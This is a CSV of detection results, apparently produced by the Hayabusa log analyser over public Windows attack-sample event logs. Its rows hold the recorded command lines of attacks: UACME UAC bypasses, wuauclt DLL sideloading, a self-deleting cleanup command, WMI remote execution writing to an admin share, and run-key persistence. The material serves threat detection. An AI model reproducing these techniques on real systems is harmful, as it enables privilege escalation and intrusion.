03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : Path: C:\Windows\System32\smartscreen.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" : Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\tendyron.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 
20:43:31.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" : Path: C:\Users\Public\tools\apt\wwlib\test.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\Public\tools\apt\wwlib\test.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows 
Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\explorer.exe"" : Path: C:\Windows\SysWOW64\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" : Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation/win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Roaming\WINWORD.exe 
--xStart",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation/win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe : URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe : URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: calc.exe : Path: C:\Windows\SysWOW64\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\ProgramData\Intel\CV.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : 
User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
